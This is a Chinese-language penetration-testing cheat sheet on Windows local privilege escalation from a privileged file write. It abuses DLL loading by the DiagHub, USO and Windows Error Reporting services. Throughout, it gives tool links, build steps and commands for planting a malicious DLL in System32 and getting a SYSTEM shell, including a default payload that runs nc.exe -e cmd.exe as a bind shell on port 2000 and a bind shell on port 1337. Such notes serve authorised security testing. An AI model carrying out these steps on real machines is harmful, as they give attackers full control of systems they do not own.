特权文件写入
DiagHub
注意:从 1903 及更高版本开始,DiagHub 不能再用于加载任意 DLL。
Microsoft 诊断中心标准收集器服务 (DiagHub) 是一种收集跟踪信息并通过 DCOM 以编程方式公开的服务。该 DCOM 对象可用于将 DLL 加载到 SYSTEM 进程中,前提是该 DLL 存在于C:\Windows\System32目录中
创建一个恶意DLL,例如:payload.dll 并将其移动到C:\Windows\System32
https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0
构建 https://github.com/xct/diaghub
diaghub.exe c:\\ProgramData\\ payload.dll
默认payload将运行C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe
替代工具:
https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
https://github.com/decoder-it/diaghub_exploit
UsoDLLLoader
此技巧不再适用于最新版本的 Windows 10 Insider Preview
如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞,可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\,然后由 USO 服务加载,以NT AUTHORITY\System执行任意代码
构建https://github.com/itm4n/UsoDllLoader
选择发布配置和 x64 架构。
构建解决方案。
DLL .\x64\Release\WindowsCoreDeviceInfo.dll
加载程序 .\x64\Release\UsoDllLoader.exe。
复制WindowsCoreDeviceInfo.dll到C:\Windows\System32\
使用加载程序并等待 shell 或运行usoclient StartInteractiveScan并连接到端口 1337 上的绑定 shell。
WerTrigger
克隆https://github.com/sailay1996/WerTrigger
复制phoneinfo.dll到C:\Windows\System32\
将Report.wer文件和WerTrigger.exe放在同一目录中。
然后,运行WerTrigger.exe。
以NT AUTHORITY\SYSTEM身份获得shell